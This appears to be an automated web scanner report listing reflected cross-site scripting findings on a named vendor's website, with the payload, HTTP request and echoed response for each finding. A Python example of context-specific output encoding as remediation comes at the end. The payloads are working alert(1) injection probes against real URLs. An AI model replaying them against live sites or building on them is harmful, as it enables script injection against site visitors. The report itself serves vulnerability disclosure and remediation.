Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b23a"-alert(1)-"622df54d13d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/usa.kaspersky.com/files/ctools4b23a"-alert(1)-"622df54d13d/css/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69f5d"><script>alert(1)</script>811dc359d64 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/usa.kaspersky.com/files/ctools/css69f5d"><script>alert(1)</script>811dc359d64/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 769eb"-alert(1)-"a9e76941f9f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/usa.kaspersky.com/files/ctools/css769eb"-alert(1)-"a9e76941f9f/4d9813e9d0c158247f09dd5a908f5979.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4e17"><script>alert(1)</script>267d3d6753e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssc4e17"><script>alert(1)</script>267d3d6753e?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0526"-alert(1)-"1eb0bf43450 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.cssc0526"-alert(1)-"1eb0bf43450?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a7f7"-alert(1)-"2f806a7d1f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c50b"><script>alert(1)</script>3e346afd99a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1c44"-alert(1)-"37a9394198f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4525b"><script>alert(1)</script>9a663ec799f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c23b"-alert(1)-"10b2e9cbe39 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc41"><script>alert(1)</script>e87ad2737ca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86da1"-alert(1)-"46ad7e8ba57 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef39"><script>alert(1)</script>823d4acb16c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a3de"-alert(1)-"0ee1a331aeb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae0a"><script>alert(1)</script>bf723308b25 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fd35"-alert(1)-"dcc2d772d0d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93a5a"-alert(1)-"05956d8a4dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53d42"><script>alert(1)</script>5b132f4cd0b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2741c"-alert(1)-"a6f7a31d0f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1723a"><script>alert(1)</script>ee20143fcdf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df53f"><script>alert(1)</script>f69aee4597f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sites/usa.kaspersky.com/files/js_injector_28.jsdf53f"><script>alert(1)</script>f69aee4597f HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 14:04:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315145073"
Content-Type: text/html; charset=utf-8
Content-Length: 32422
Date: Sun, 04 Sep 2011 14:04:40 GMT
X-Varnish: 1163242244
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_28.jsdf53f"><script>alert(1)</script>f69aee4597f" />
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 995ee"-alert(1)-"4c55e7351ad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sites/usa.kaspersky.com/files/js_injector_28.js995ee"-alert(1)-"4c55e7351ad HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 14:05:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315145114"
Content-Type: text/html; charset=utf-8
Content-Length: 36855
Date: Sun, 04 Sep 2011 14:05:20 GMT
X-Varnish: 1163243798
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12019"-alert(1)-"cc53a18bcad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store12019"-alert(1)-"cc53a18bcad/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c3d"><script>alert(1)</script>728d01007db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /store61c3d"><script>alert(1)</script>728d01007db/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1823e"-alert(1)-"c57b3ddd40c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store/index.html1823e"-alert(1)-"c57b3ddd40c HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a44b"><script>alert(1)</script>45b650893da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /store/index.html2a44b"><script>alert(1)</script>45b650893da HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/store/index.html2a44b"><script>alert(1)</script>45b650893da" />
...[SNIP]...
1.241. http://usa.kaspersky.com/store/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /store/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78669"><script>alert(1)</script>5799514c24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /store/index.html?78669"><script>alert(1)</script>5799514c24=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/store/index.html?78669"><script>alert(1)</script>5799514c24=1" />
...[SNIP]...
1.242. http://usa.kaspersky.com/store/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usa.kaspersky.com
Path: /store/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 851c8"-alert(1)-"81aae218061 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store/index.html?851c8"-alert(1)-"81aae218061=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
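Every finding in this section is one of two sinks: the request path or parameter name lands inside a double-quoted HTML attribute (the reflected canonical link) or inside a double-quoted JavaScript string. The remediation notes above say to avoid the script context where possible; where the value must be emitted, the fix is to encode it for the exact context it lands in. The following is an added example, not code from the scanned site or from the report: render_vulnerable() mirrors the behaviour the findings describe, render_hardened() applies one encoder per context, and echoed_unmodified() is the report's own detection criterion. The template and the variable name currentPath are hypothetical; the two payloads are the ones recorded above.

```python
"""Contextual output encoding for the two sink types the report records.

Added example, not code from the scanned site. render_vulnerable() mirrors the
behaviour the report describes (the request path lands raw inside a
double-quoted href attribute and a double-quoted JavaScript string);
render_hardened() is one correct way to fix it. The page template and the
variable name currentPath are hypothetical.
"""
import html
import json

# Payloads recorded in the report, one per sink context.
ATTR_PAYLOAD = '2a44b"><script>alert(1)</script>45b650893da'   # HTML attribute sink
JS_PAYLOAD = '1823e"-alert(1)-"c57b3ddd40c'                    # JavaScript string sink

TEMPLATE = (
    '<link rel="canonical" href="http://usa.kaspersky.com{href}" />\n'
    '<script>var currentPath = "{js}";</script>'
)


def render_vulnerable(path: str) -> str:
    """The flaw: one unencoded value is pasted into two different contexts."""
    return TEMPLATE.format(href=path, js=path)


def encode_html_attr(value: str) -> str:
    """For a double-quoted attribute value: & < > " ' become entities, so the
    payload can no longer close the attribute or start a tag."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """For the inside of a double-quoted JavaScript string literal.
    json.dumps escapes quotes, backslashes, control characters and (with the
    default ensure_ascii=True) every non-ASCII code point, including the
    U+2028/U+2029 line terminators. HTML-significant characters are escaped
    as well, because the HTML parser runs before the JavaScript parser and a
    literal "</script>" inside the string would end the enclosing block."""
    encoded = json.dumps(value)[1:-1]           # drop json's surrounding quotes
    for ch, esc in (('<', '\\u003c'), ('>', '\\u003e'), ('&', '\\u0026')):
        encoded = encoded.replace(ch, esc)
    return encoded


def render_hardened(path: str) -> str:
    """Same template; each placeholder gets the encoder for its own context.
    Attribute encoding alone would leave the script sink open, and JS-string
    encoding alone would leave the attribute sink open."""
    return TEMPLATE.format(href=encode_html_attr(path), js=encode_js_string(path))


def echoed_unmodified(payload: str, body: str) -> bool:
    """The report's detection criterion: the probe survives byte for byte."""
    return payload in body


if __name__ == '__main__':
    for payload in (ATTR_PAYLOAD, JS_PAYLOAD):
        path = '/store/index.html' + payload
        print('vulnerable reflects:', echoed_unmodified(payload, render_vulnerable(path)))
        print('hardened reflects:  ', echoed_unmodified(payload, render_hardened(path)))
```

Both payloads survive render_vulnerable() and neither survives render_hardened(); the hardened canonical link carries `&quot;&gt;&lt;script&gt;` and the hardened script carries `\"` and `\u003c`, so neither context can be broken out of. The encoders are context-specific on purpose: one generic "sanitize" pass is what usually leaves a second sink, like the JavaScript string here, still exploitable.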